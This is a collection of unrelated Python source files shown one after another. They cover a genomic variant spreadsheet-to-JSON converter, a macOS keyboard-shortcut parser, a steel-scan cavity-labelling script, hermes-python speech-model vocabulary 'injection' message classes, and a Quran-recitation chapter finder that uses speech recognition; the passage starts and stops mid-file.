#ALERT: please confirm this is the correct interpretation
'europeExac': ('ExAC European', 'hg19_popfreq_all_20150413_exac_nfe'),
'1kgenomes': ('1000 Genomes', 'hg19_popfreq_all_20150413_1000g_all')
}
stringColumnCorrespondenceDict = {
'clinvar': ('clinvar_clinical_significance')
}
#defaultNumericDrawingCols = ['QUAL','Max_Allele_Freq_Summary','hg19_phastConsElements46way_r_MSA_MCE_lod','hg19_ljb26_all_CADD_raw','AD','hg19_ljb26_all_Polyphen2_HDIV_score','exac_tolerance_r_lof_z','DP']
#defaultStringDrawingCols = ['clinvar_clinical_significance','Function_Summary','ExonicFunction_Summary']
#----------------------------------------------------------------
#reads out necessary fields from the annotation tsv file
#DEPRECATED! Here only in case we want to allow the user to provide a TSV as the input file
def read_tsv(tsv):
data = []
with open(tsv) as f:
lines = f.readlines()
#just to be safe we strip out all returns from the input data (carriage returns and new line returns)
columns = lines[0].strip('\n').strip('\r').split('\t')
print columns
#for line in lines[1:]:
for line in lines[1:100]:
data.append(line.strip('\n').strip('\r').split('\t'))
return columns, data
#iterates through the values in a
#gets basic variant info (i.e ref/alt etc) and writes it
def get_variant_info(variantLine, idx_dict, variantRecord):
#CHANGE the structure of this
for col in infoCols:
val = variantLine[idx_dict[col]]
#ensure that we don't append the empty string, this breaks interpretation
if val == '': val = 'na'
if col == 'Gene_Summary': val = random.choice(['OR2T35', "BRCA1", "AFF3", "MYO7B", "ZNF806", "NEB", "SP100", "SYN2"])
variantRecord['coreStmpFields']['infoFields'][col] = val
#writes output to a file that can then be read by the graphical interface
#each variant gets its own file
def write_file(columns, linesToWrite, pos):
savePath = "/home/noahfrie/noahfrie/devCode/stmpViz/outputFiles"
fullName = os.path.join(savePath, pos +'viz.txt')
f = open(fullName, 'w')
for line in linesToWrite:
f.write(line)
f.write('\n')
f.close
#initializes the json dictionary structure used to store data values
#the structure is:
#for each variant:
#{
# coreStmpFields: {
# infoFields: {}
# numericAnnotations: {}
# stringAnnotations: {}
# }
# metainfo?
#}
#the templates for what these parts of the json should look like
infoFieldTemplate = {'value': '', 'includeInDrawing': False}
numericAnnotationTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
stringAnnotationTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
otherFieldTemplate = {'value': '', 'drawingValue': '', 'includeInDrawing': False, 'associatedValues': []}
#converts a row of the data frame to a json file for the visualization
def convert_df_row_to_json(row, curDf):
#build up the simple skeleton of the json
variant = {}
coreAnnotationFields = {'infoFields': '', 'numericAnnotations': '', 'stringAnnotations': '', 'otherFields': ''}
variant['coreAnnotationFields'] = coreAnnotationFields
infoFields = {}
numericAnnotations = {}
stringAnnotations = {}
otherFields = {}
colnames = curDf.columns
for col in colnames:
if xls_parsing_functions.find_official_column_name(infoColumnCorrespondenceDict, col, curDf) != None:
valName = xls_parsing_functions.find_official_column_name(infoColumnCorrespondenceDict, col, curDf)
infoFieldSkeleton = infoFieldTemplate
infoFieldSkeleton['value'] = row[col]
infoFields[valName] = infoFieldSkeleton
elif xls_parsing_functions.find_official_column_name(numericColumnCorrespondenceDict, col, curDf) != None:
valName = xls_parsing_functions.find_official_column_name(numericColumnCorrespondenceDict, col, curDf)
numericFieldSkeleton = numericAnnotationTemplate
numericFieldSkeleton['value'] = row[col]
numericAnnotations[valName] = numericFieldSkeleton
elif xls_parsing_functions.find_official_column_name(stringColumnCorrespondenceDict, col, curDf) != None:
valName = xls_parsing_functions.find_official_column_name(stringColumnCorrespondenceDict, col, curDf)
stringFieldSkeleton = stringAnnotationTemplate
stringFieldSkeleton['value'] = row[col]
stringAnnotations[valName] = stringFieldSkeleton
else:
valName = col
otherFieldSkeleton = otherFieldTemplate
otherFieldSkeleton['value'] = row[col]
otherFields[valName] = otherFieldSkeleton
variant['coreAnnotationFields']['infoFields'] = infoFields
variant['coreAnnotationFields']['numericAnnotations'] = numericAnnotations
variant['coreAnnotationFields']['stringAnnotations'] = stringAnnotations
variant['coreAnnotationFields']['otherFields'] = otherFields
return variant
#init the metadata component of the variant structure
def init_variant_metadata_structure(variant, sheetName):
variantMetadataStruct = {'metrics': '', 'workflow': ''}
metricsDict = {'numTimesClicked': ''}
workflowDict = {'curationMode': sheetName, 'freeTextNotes': 'enter any notes here'}
variantMetadataStruct['metrics'] = metricsDict
variantMetadataStruct['workflow'] = workflowDict
return variantMetadataStruct
#testing function that pretty prints the json structure
def json_pretty_print_struct(jsonFile):
parsed = json.loads(jsonFile)
print json.dumps(parsed, indent=4, sort_keys=True)
def write_json_file(filename, parsedJson):
jsonFile = open(filename, 'w+')
jsonFile.write(json.dumps(parsedJson))
#--------------------MAIN CODE-------------------------------
#test code for sorting data by specified value
inputXls = sys.argv[1]
sheetDict = xls_parsing_functions.read_xls_sheets(inputXls)
xls = pd.ExcelFile(inputXls)
sheetNames = xls.sheet_names
jsonData = []
for sheetName in sheetNames:
for index, row in sheetDict[sheetName].iterrows():
curVariant = convert_df_row_to_json(row, sheetDict[sheetName])
#set the metadata
curVariant['metadata'] = init_variant_metadata_structure(curVariant, sheetName)
jsonData.append(curVariant)
#alert adjust the path based on the environment in which we are doing this
jsonFilename = 'visualization.json'
#jsonFilename = inputXls.strip('.xls') + '_visualization.json'
print 'writing json data to ', jsonFilename
write_json_file(jsonFilename, jsonData)
#json_pretty_print_struct(json.dumps(jsonData))
|
<filename>src/ksc/macos.py
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
Classes to represent MacOS keys and shortcuts
"""
import collections
import re
class MacOSKey:
"""store the name of a key, input names, ane render names for that key"""
# pylint: disable=too-many-instance-attributes, too-few-public-methods
def __init__(
self,
key,
name,
input_names=None,
shifted_key=None,
html_entity=None,
clarified_name=None,
ascii_key=None,
modifier=False,
):
# pylint: disable=too-many-arguments)
self.key = key
"""The (usually) single character representation of the key. For modifiers and
most other named keys, we use the unicode representation, i.e. ⌘ for command,
→ for Right Arrow, etc."""
self.name = name
"""The name of this key spelled out, ie the ← key is Left Arrow. If
the key is F, the name is F."""
self.input_names = input_names
"""A list of names which a user can input to reference this key"""
self.shifted_key = shifted_key
"""If the key has a different output when the shift key is pressed, put
the shifted value here"""
self.clarified_name = clarified_name
"""Some keys can benefit from a clarified name, like Period (.) instead of ."""
self.html_entity = html_entity
"""If this key has an HTML entity, store it here"""
self.modifier = modifier
"""True if this key is a modifier key, like Fn, Shift, etc."""
self.ascii_key = ascii_key
"""If the key is a modifier, it also has an ASCII representation, like ~ for Option"""
class MacOS:
"""The keys and their properties for MacOS
Includes methods to parse user input into shortcuts
"""
# make a list of keys, if the key isn't in this list (like F or R), then
# it's just a single character key with nothing special about it
keys = [
# order matters for the modifier keys, they need to be in the apple
# recommended order for displaying modifier keys
MacOSKey("Fn", "Fn", ["func", "function", "fn"], ascii_key="*", modifier=True),
MacOSKey(
"⌃", # this is not a caret, it's another unicode character
"Control",
["control", "cont", "ctrl", "ctl"],
ascii_key="^", # this one is a caret
modifier=True,
),
MacOSKey("⌥", "Option", ["option", "opt", "alt"], ascii_key="~", modifier=True),
MacOSKey("⇧", "Shift", ["shift", "shft"], ascii_key="$", modifier=True),
MacOSKey(
"⌘", "Command", ["command", "cmd", "clover"], ascii_key="@", modifier=True
),
MacOSKey("⎋", "Escape", ["escape", "esc"]),
MacOSKey("⇥", "Tab", ["tab"]),
MacOSKey("⇪", "Caps Lock", ["capslock", "caps"]),
MacOSKey("␣", "Space", ["space"]),
MacOSKey("⏏", "Eject", ["eject"]),
MacOSKey("⌫", "Delete", ["delete", "del"]),
MacOSKey(
"⌦",
"Forward Delete",
["forwarddelete", "fwddelete", "forwarddel", "fwddel"],
),
MacOSKey("⌧", "Clear", ["clear"], clarified_name="Clear (⌧)"),
MacOSKey("↩", "Return", ["return", "rtn"]),
MacOSKey("⌅", "Enter", ["enter", "ent"]),
MacOSKey("⇞", "Page Up", ["pageup", "pgup"]),
MacOSKey("⇟", "Page Down", ["pagedown", "pgdown"]),
MacOSKey("↖", "Home", ["home"]),
MacOSKey("↘", "End", ["end"]),
MacOSKey("←", "Left Arrow", ["leftarrow", "left"]),
MacOSKey("→", "Right Arrow", ["rightarrow", "right"]),
MacOSKey("↑", "Up Arrow", ["uparrow", "up"]),
MacOSKey("↓", "Down Arrow", ["downarrow", "down"]),
MacOSKey("leftclick", "click", ["leftclick", "click"]),
MacOSKey("rightclick", "right click", ["rightclick", "rclick"]),
MacOSKey(
"`",
"`",
["grave", "backtick", "backquote"],
shifted_key="~",
clarified_name="Grave (`)",
),
MacOSKey("~", "~", ["tilde"], clarified_name="Tilde (~)"),
MacOSKey("1", "1", shifted_key="!"),
MacOSKey("2", "2", shifted_key="@"),
MacOSKey("3", "3", shifted_key="#"),
MacOSKey("4", "4", shifted_key="$"),
MacOSKey("5", "5", shifted_key="%"),
MacOSKey("6", "6", shifted_key="^"),
MacOSKey("7", "7", shifted_key="&"),
MacOSKey("8", "8", shifted_key="*"),
MacOSKey("9", "9", shifted_key="("),
MacOSKey("0", "0", shifted_key=")"),
MacOSKey("-", "-", ["minus"], shifted_key="_", clarified_name="Minus Sign (-)"),
MacOSKey("_", "_", ["underscore"], clarified_name="Underscore (_)"),
MacOSKey("=", "=", ["equals", "equal"], shifted_key="+"),
MacOSKey("+", "+", ["plus"], clarified_name="Plus Sign (+)"),
MacOSKey("[", "[", shifted_key="{"),
MacOSKey("]", "]", shifted_key="}"),
MacOSKey("\\", "\\", ["backslash"], shifted_key="|"),
MacOSKey("|", "|", ["pipe"]),
MacOSKey(
";",
";",
["semicolon", "semi"],
shifted_key=":",
clarified_name="Semicolon (;)",
),
MacOSKey(
"'",
"'",
["singlequote", "sq"],
shifted_key='"',
clarified_name="Single Quote (')",
),
MacOSKey('"', '"', ["doublequote", "dq"], clarified_name='Double Quote (")'),
MacOSKey(",", ",", ["comma"], shifted_key="<", clarified_name="Comma (,)"),
MacOSKey(".", ".", ["period"], shifted_key=">", clarified_name="Period (.)"),
MacOSKey("/", "/", ["slash"], shifted_key="?", clarified_name="Slash (.)"),
MacOSKey("?", "?", ["questionmark", "question"]),
]
# programatically create 35 function keys
# we choose 35 because that's how many are defined in NSEvent()
# see https://developer.apple.com/documentation/appkit/1535851-function-key_unicodes
for _num in range(1, 36):
_fkey = "F{}".format(_num)
keys.append(MacOSKey(_fkey, _fkey, [_fkey.lower()]))
# modifiers is a subset of keys
modifiers = []
for _key in keys:
if _key.modifier:
modifiers.append(_key)
# build a keyname dictionary lookup
keyname_map = {}
for _key in keys:
if _key.input_names:
for _name in _key.input_names:
keyname_map[_name] = _key
#
# construct various data structures from keys, which are the authoritative
# source
# the hyper key is a wierd because its a combination of other keys, so we have to
# handle it separately
hyper_mods = []
hyper_mods.append(keyname_map["control"])
hyper_mods.append(keyname_map["option"])
hyper_mods.append(keyname_map["shift"])
hyper_mods.append(keyname_map["command"])
hyper_name = "Hyper"
hyper_regex = r"\b" + hyper_name.lower() + r"\b"
# can't refactor mods_ascii and mods_unicode into a single
# dictionary, see parse_shortcut() for why
mods_ascii = collections.OrderedDict()
mods_unicode = collections.OrderedDict()
unshifted_keys = ""
shifted_keys = ""
mods_regexes = []
for _key in keys:
if _key.modifier:
mods_ascii[_key.ascii_key] = _key
mods_unicode[_key.key] = _key
_regex = r"\b(" + "|".join(_key.input_names) + r")\b"
mods_regexes.append((_key, _regex))
if _key.shifted_key:
unshifted_keys += _key.key
shifted_keys += _key.shifted_key
# make some translation tables
to_shifted_trans = str.maketrans(unshifted_keys, shifted_keys)
to_unshifted_trans = str.maketrans(shifted_keys, unshifted_keys)
@classmethod
def named_keys(cls, *, hyper=False, **_):
"""Return a string containing a formatted list of all known keys
Designed to be called with the namespace from argparse:
ksc.MacOS.named_keys(**vars(args)))
If not using argparse, you can just pass the keyword only
arguments as you typically would
"""
# start with the modifiers
output = []
fmt = "{:12} {:18} {}"
output.append(fmt.format("Key", "Name", "Inputs"))
output.append(fmt.format("-" * 12, "-" * 18, "-" * 50))
keyflag = True
for key in cls.keys:
if key.modifier is False and keyflag is True:
if hyper:
output.append(
fmt.format(" ", cls.hyper_name, cls.hyper_name.lower())
)
keyflag = False
if key.key != key.name or key.clarified_name or key.input_names:
output.append(
fmt.format(
key.key,
key.clarified_name or key.name,
",".join(key.input_names if key.input_names else ""),
)
)
return "\n".join(output)
@classmethod
def parse_shortcuts(cls, text):
"""parse a string or array of text into a standard representation of the shortcut
text = a string of text to be parsed
returns an array of shortcut combinations
"""
combos = []
for combo in re.split(r" [/|] ", text):
combos.append(cls.parse_shortcut(combo))
return combos
@classmethod
def parse_shortcut(cls, text):
"""parse a string and return a MacOSKeyboardShortcut object
Raises ValueError if string can't be parsed
"""
# pylint: disable=too-many-branches
# save the original text for an error message
orig_text = text
mods = []
key = ""
# Only remove hyphens preceeded and followed by non-space character
# to avoid removing the last hyphen from 'option-shift--' or 'command -'
text = re.sub(r"(?<=\S)-(?=\S)", " ", text)
# remove words that represent modifiers from the text, and add them
# to the 'mods' array
for (mod, regex) in cls.mods_regexes:
(text, howmany) = re.subn(regex, "", text, re.IGNORECASE)
if howmany:
mods.append(mod)
# look for the hyper key
(text, howmany) = re.subn(cls.hyper_regex, "", text, re.IGNORECASE)
if howmany:
for mod in cls.hyper_mods:
mods.append(mod)
# process the remainder of the text
for char in text.strip():
if char == " ":
continue
if char in cls.mods_unicode:
# translate unicode modifier symbols to their plaintext equivilents
mods.append(cls.mods_unicode[char])
elif char in cls.mods_ascii and cls.mods_ascii[char] not in mods:
# but since plaintext modifiers could also be a key, aka
# @$@ really means command-shift-2, we only treat the first
# occurance of a plaintext modifier as a modifier, subsequent
# occurances are the key
mods.append(cls.mods_ascii[char])
else:
key += char
# map key names to key symbols
if key.lower() in cls.keyname_map:
# special key names, pgup, etc are in lowercase
key = cls.keyname_map[key.lower()].key
if len(key) == 1:
if key in cls.shifted_keys:
# command % should be command shift 5
# and command ? should be command shift ?
# these ↓ are the shifted number keys
mods.append(cls.keyname_map["shift"]) # dups will get removed later
# the unwritten apple rule that shifted numbers are
# written as numbers not their symbols
if key in "!@#$%^&*()":
key = key.translate(cls.to_unshifted_trans)
else:
if cls.keyname_map["shift"] in mods:
# shift is in the mods, and the key is unshifted
# we should have the shifted symbol unless it is
# a number or letter
# command shift 5 should remain command shift 5
# and command shift r should remain command shift r
if key not in "0123456789":
# but shift command / should be shift command ?
key = key.translate(cls.to_shifted_trans)
# shortcuts always displayed with upper case letters
key = key.upper()
else:
if key.lower() in cls.keyname_map:
# these are the function keys because they are in the map
# and the key name is longer than a single character
# either way, if the key is in the map then it's valid
pass
else:
raise ValueError("error parsing '{}'".format(orig_text))
# remove duplicate modifiers
mods = list(set(mods))
# sort the mods to be in Apple's recommended order
mods.sort(key=cls.keys.index)
return MacOSKeyboardShortcut(mods, key)
class MacOSKeyboardShortcut:
"""Store and render a keyboard shortcut in the macos flavor
When this object is created, it expects the modifiers, if present, are in the
correct order as specified by the Apple Style Guidelines. This occurs in
MacOS.parse_shortcut().
"""
def __init__(self, mods, key):
"""
mods is a list of MacOSKey objects which are modifiers
key is the keyname (i.e L, ←, 5 or F12)
"""
self.mods = mods
self.key = key
def __repr__(self):
"""custom repr"""
return "MacOSKeyboardShortcut('{}')".format(self.render())
def __str__(self):
"""custom string representation"""
return self.render()
def render(
self,
*,
hyper=False,
modifier_symbols=False,
modifier_ascii=False,
plus_sign=False,
key_symbols=False,
clarify_keys=False,
**_
):
"""render this key as a string for human consumption
Designed to be called with the namespace from argparse:
combo.render(**vars(args))
If not using argparse, you can just pass the keyword only
arguments as you typically would
"""
tokens = []
joiner = ""
if modifier_symbols:
if plus_sign:
joiner = "+"
tokens.extend(self.mod_symbols())
elif modifier_ascii:
joiner = ""
tokens.extend(self.mod_ascii())
else:
joiner = "-"
tokens.extend(self.mod_names(hyper=hyper))
if key_symbols:
tokens.extend(self.key)
else:
tokens.append(self.key_name(clarify_keys=clarify_keys))
return joiner.join(tokens)
def mod_names(self, hyper=False):
"""return a list of modifier names for this shortcut"""
output = []
if hyper and self.mods == MacOS.hyper_mods:
output.append(MacOS.hyper_name)
else:
for mod in self.mods:
output.append(mod.name)
return output
def mod_symbols(self):
"""return a list of unicode symbols representing the modifier names"""
output = []
for mod in self.mods:
output.append(mod.key)
return output
def mod_ascii(self):
"""return a list of ascii symbols representing the modifier names"""
output = []
for mod in self.mods:
output.append(mod.ascii_key)
return output
def key_name(self, *, clarify_keys=False):
"""return either the key, or if it has a name return that"""
# find the key object, if it exists
keyobj = None
for keytest in MacOS.keys:
if self.key == keytest.key:
keyobj = keytest
break
# if we have a key object, then use it's name and clarified name
if keyobj:
if clarify_keys and keyobj.clarified_name:
return keyobj.clarified_name
return keyobj.name
# otherwise
return self.key
|
import os, numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt, cm
from pymicro.file.file_utils import HST_read, HST_write, HST_info
data_dir = '../../examples/data'
scan_name = 'steel_431x431x246_uint8'
scan_path = os.path.join(data_dir, scan_name + '.raw')
print('reading volume...')
data = HST_read(scan_path, header_size=0)
plt.figure(1, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
print('rotating volume...')
data = ndimage.rotate(data, 15.5, axes=(1, 0), reshape=False)
plt.subplot(122)
plt.imshow(data[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_data.png')
print('binarizing volume...')
data_bin = np.where(np.greater(data, 100), 0, 255).astype(np.uint8)
print('labeling cavities...')
label_im, nb_labels = ndimage.label(data_bin)
plt.figure(2, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data_bin[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplot(122)
plt.imshow(label_im[:, :, 87].transpose(), interpolation='nearest', cmap=cm.jet)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_label.png')
print('nb of labels: %s' % nb_labels)
sizes = ndimage.sum(data_bin / 255, label_im, range(1, nb_labels + 1))
# simple ring removal artifact
coms = ndimage.measurements.center_of_mass(data_bin / 255, labels=label_im, \
index=range(1, nb_labels + 1))
rings = 0
for i in range(nb_labels):
com_x = round(coms[i][0])
com_y = round(coms[i][1])
com_z = round(coms[i][2])
if not label_im[com_x, com_y, com_z] == i + 1:
print 'likely found a ring artifact at (%d, %d, %d) for label = %d, value is %d' \
% (com_x, com_y, com_z, (i + 1), label_im[com_x, com_y, com_z])
data_bin[label_im == (i + 1)] = 0
rings += 1
print 'removed %d rings artifacts' % rings
print('labeling and using a fixed color around the specimen')
# the outside is by far the largest label here
mask_outside = (sizes >= ndimage.maximum(sizes))
print('inverting the image so that outside is now 1')
data_inv = 1 - label_im
outside = mask_outside[data_inv]
outside = ndimage.binary_closing(outside, iterations=3)
# fix the image border
outside[0:3, :, :] = 1;
outside[-3:, :, :] = 1;
outside[:, 0:3, :] = 1;
outside[:, -3:, :] = 1;
outside[:, :, 0:3] = 1;
outside[:, :, -3:] = 1
data_bin[outside] = 155
plt.figure(3, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data_inv[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.clim(0, 1)
plt.subplot(122)
plt.imshow(data_bin[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_outside.png')
print('saving data...')
HST_write(data_bin, scan_name + '_bin.raw')
|
<reponame>fraserloch/hermes-protocol<filename>platforms/hermes-python/hermes_python/ontology/injection/__init__.py
from typing import Optional, Text, List, Mapping
from ...ffi.ontology.injection import InjectionKind, CInjectionRequestMessage, CInjectionResetCompleteMessage, CInjectionResetRequestMessage, CInjectionCompleteMessage
class InjectionStatusMessage(object):
def __init__(self, last_injection_date):
self.last_injection_date = last_injection_date
@classmethod
def from_c_repr(cls, c_repr):
last_injection_date = c_repr.last_injection_date.decode('utf-8')
return cls(last_injection_date)
class InjectionRequestMessage(object):
def __init__(self, operations, lexicon=dict(), cross_language=None, id=None):
# type: (List[InjectionRequestOperation], Mapping[Text, List[Text]], Optional[Text], Optional[Text]) -> None
"""
:param operations: List of operations to execute in the order of the list on a model
:type operations: List[InjectionRequestOperation]
:param lexicon: List of pre-computed prononciations to add in a model
:type lexicon: Mapping[Text, List[Text]]
:param cross_language: Language for cross-language G2P
:type cross_language: Optional[Text]
:param id: The id of the `InjectionRequestMessage` that was processed
:type id: Optional[Text]
"""
self.operations = operations
self.lexicon = lexicon
self.cross_language = cross_language
self.id = id
def __eq__(self, other):
return self.__dict__ == other.__dict__
@classmethod
def from_c_repr(cls, c_repr):
number_of_operations = c_repr.operations.contents.count
c_operations_array_repr = c_repr.operations.contents.operations
operations = [InjectionRequestOperation.from_c_repr(c_operations_array_repr[i].contents) for i in
range(number_of_operations)]
lexicon = c_repr.lexicon.contents.into_repr()
cross_language = c_repr.id.decode('utf-8') if c_repr.cross_language else None
id = c_repr.id.decode('utf-8') if c_repr.id else None
return cls(operations, lexicon, cross_language, id)
def into_c_repr(self):
return CInjectionRequestMessage.from_repr(self)
class InjectionRequestOperation(object):
def __init__(self, values):
self.values = values
def __eq__(self, other):
return self.__dict__ == other.__dict__
@classmethod
def from_c_repr(cls, c_repr):
kind = InjectionKind(c_repr.kind)
if kind == InjectionKind.ADD_FROM_VANILLA:
return AddFromVanillaInjectionRequest.from_c_repr(c_repr)
elif kind == InjectionKind.ADD:
return AddInjectionRequest.from_c_repr(c_repr)
else:
raise ("Unknown injection kind")
class AddInjectionRequest(InjectionRequestOperation):
def __init__(self, values):
# type:(Mapping[Text, List[Text]]) -> None
self.kind = InjectionKind.ADD
self.values = values
@classmethod
def from_c_repr(cls, c_repr):
values = c_repr.values.contents.into_repr()
return cls(values)
class AddFromVanillaInjectionRequest(InjectionRequestOperation):
def __init__(self, values):
self.kind = InjectionKind.ADD_FROM_VANILLA
self.values = values
@classmethod
def from_c_repr(cls, c_repr):
values = c_repr.values.contents.into_repr()
return cls(values)
class InjectionCompleteMessage(object):
def __init__(self, request_id):
# type: (Text) -> None
"""
:param request_id: The id of the injection request that just completed.
:type request_id: Text
"""
self.request_id = request_id
def __eq__(self, other):
return other.__dict__ == self.__dict__
@classmethod
def from_c_repr(cls, c_repr):
request_id = c_repr.request_id.decode('utf-8')
return cls(request_id)
def into_c_repr(self):
return CInjectionCompleteMessage.from_repr(self)
class InjectionResetRequestMessage(object):
def __init__(self, request_id):
# type: (Text) -> None
"""
:param request_id: The id of the injection reset request.
:type request_id: Text
"""
self.request_id = request_id
def __eq__(self, other):
return other.__dict__ == self.__dict__
@classmethod
def from_c_repr(cls, c_repr):
request_id = c_repr.request_id.decode('utf-8')
return cls(request_id)
def into_c_repr(self):
return CInjectionResetRequestMessage.from_repr(self)
class InjectionResetCompleteMessage(object):
def __init__(self, request_id):
# type: (Text) -> None
"""
:param request_id: The id of the injection reset request that just completed.
:type request_id: Text
"""
self.request_id = request_id
def __eq__(self, other):
return other.__dict__ == self.__dict__
@classmethod
def from_c_repr(cls, c_repr):
request_id = c_repr.request_id.decode('utf-8')
return cls(request_id)
def into_c_repr(self):
return CInjectionResetCompleteMessage.from_repr(self)
|
<gh_stars>0
from core.search_engine import SearchEngine
from core.asr import ASR
class Finder:
'''
Take a segment and find if a chapter beginning is in it
try to get the location of the beginning
'''
def __init__(self):
super().__init__()
self.EXAMINE_DURATION = 30 # seconds
self.SAME_TIME_THRESHOLD = 7 # seconds. if abs(t - start) < SAME_TIME_THRESHOLD, we will consider t as start
self.asr = ASR()
self.searchEngine = SearchEngine()
self.searchEngine.loadOrBuild(indexDir="./core/search_engine/index_allstored")
self.chaptersBeginnings = self.readChaptersBeginnings()
self.chaptersInfo = self.readChaptersInfos()
def find(self, filePath, start, end):
'''
filepath: original file that have the pray including the recitation
start: start of the recitation rak3a
end: end of the recitation rak3a
segment = audio(filepath)[start:end]
this function examines first 30 seconds of the segment, and last 30 seconds of the segment
'''
totalDuration = end - start
duration = min(totalDuration, self.EXAMINE_DURATION)
def continuousFind(xstart, shift): # validate the result till find applicable one
maxTests = 15
while(True):
approximatedText = self.asr.recognizeGoogle(filePath, xstart, duration)
print("approximatedText:", approximatedText)
if(len(approximatedText) < 45):
xstart += shift
print(f"approximated text is very short.. we will try next block. try next block @ {xstart}")
continue
results, locations = self.searchEngine.search(approximatedText, limit=1)
bestAya = locations[0]
if(bestAya['page_score'] > 20): return bestAya, True
xstart += shift
print(bestAya)
print(f"very low page score={bestAya['page_score']} < 20. try next block @ {xstart}")
maxTests -= 1
if(maxTests == 0):
print("max tests of 15 reached. break now")
return None, False
# first aya in the segment
bestAyaStart, succ = continuousFind(start, duration)
if(not succ):
return None
# last aya in the segment
bestAyaEnd, succ = continuousFind(end - duration, -duration)
if(not succ):
return None
print(bestAyaStart)
print(bestAyaEnd)
page1, page2 = bestAyaStart['page'], bestAyaEnd['page']
sura1, sura2 = bestAyaStart['sura'], bestAyaEnd['sura']
totalPages = page2 - page1 + 1
approxPageDuration = totalDuration / totalPages # 134 seconds per page
if(page2 < page1 or sura2 < sura1):
print("pageEnd < pageStart. segment expected wrongly")
return None
# find chapters
chapters = self.chaptersInRange(page1, page2)
chaptersResult = [{} for _ in range(len(chapters))]
chapterOnBeginning = False # flag to check pre-part of first chapter in the segment
for cri, chapterInfo in enumerate(chapters):
chapterIndex, chapterPageBegin = chapterInfo
if not (chapterIndex >= sura1 and chapterIndex <= sura2): # to ignore case of begin of chapter is not in the begin of page. and reciter has not start in the new chapter
continue
# try finding the location in the segment that chapter begin
print(f"try finding the page where chapter #{chapterIndex} begin (page #{chapterPageBegin})")
# expect
expected = start + approxPageDuration * (chapterPageBegin - page1)
expected = min(expected, end - self.EXAMINE_DURATION) # always be in segment
bestAya, newExpected, succ = self.findPageSecond(filePath, expected, duration, start, end, chapterPageBegin)
increasing = newExpected > expected
expected = newExpected
print(f"chapter {chapterIndex} is around {expected} seconds")
if(succ):
# try finding first aya location on the page if we succeeded in finding wanted page
bestAya, expected = self.findOnPage(filePath, duration, bestAya, expected, increasing, chapterIndex)
print(f"chapter {chapterIndex} is most probably at {expected} seconds")
if(abs(start - expected) < self.SAME_TIME_THRESHOLD):
print(f"adjust {expected} to the beginning of the segment({start}) as it is more reasonable")
expected = start
chapterOnBeginning = True
bestAya = bestAyaStart
chaptersResult[cri]["expected_start"] = expected
chaptersResult[cri]["is_accurate"] = succ
chaptersResult[cri]["is_first_part"] = True
chaptersResult[cri]["is_last_part"] = False
chaptersResult[cri]["best_aya"] = bestAya
if(cri > 0):
chaptersResult[cri - 1]["expected_end"] = expected
chaptersResult[cri]["is_last_part"] = True
while {} in chaptersResult:
chaptersResult.remove({})
if(len(chaptersResult) > 0):
if(not chapterOnBeginning):
expectedEnd = chaptersResult[0]['expected_start']
acc = chaptersResult[0]['is_accurate']
chaptersResult.insert(0, {
"expected_start": start,
"expected_end": expectedEnd,
"is_accurate": acc,
"is_first_part": False,
"is_last_part": True, # because we know that after it there is a chapter
"best_aya": bestAyaStart
})
chaptersResult[-1]["expected_end"] = end
else:
chaptersResult.append({
"expected_start": start,
"expected_end": end,
"is_accurate": True,
"is_first_part": False,
"is_last_part": False, # maybe the last part
"best_aya": bestAyaStart
})
return chaptersResult
def chaptersInRange(self, startPage, endPage):
res = []
for chapterIndex, chapterBegin in enumerate(self.chaptersBeginnings):
# chapterIndex is zero based
chapterBegin = int(chapterBegin)
if(chapterBegin >= startPage and chapterBegin <= endPage):
res.append([chapterIndex + 1, chapterBegin])
if(chapterBegin > endPage): break
return res
def readChaptersBeginnings(self):
with open("../assets/chapters_begin_page.txt") as f:
return f.read().splitlines(False)
def readChaptersInfos(self):
with open("../assets/chapters_page_info.txt") as f:
return f.read().splitlines(False)
def findPageSecond(self, filePath, expected, duration, mn, mx, targetPage):
expected = expected or mn
increasing = None # this value will be overridden in the first iteration
maxTests = 15
actualPage = targetPage - 1 # work around for None in first iteration issue
while(expected <= mx and expected >= mn): # get the wanted page
maxTests -= 1
approximatedText = self.asr.recognizeGoogle(filePath, expected, duration)
if(approximatedText):
results, locations = self.searchEngine.search(approximatedText, limit=1) # TODO: narrow down the search documents here
actualPage = locations[0]['page'] # TODO: if in first iteration text is None, this will cause error in the check "actualPage == targetPage"
else:
print("ASR returns None @find at", expected)
print(f"actual page, wanted page = {actualPage}, {targetPage}")
if(actualPage == targetPage):
return locations[0], expected, True
elif(actualPage > targetPage):
expected -= self.EXAMINE_DURATION
increasing = False
elif(actualPage < targetPage):
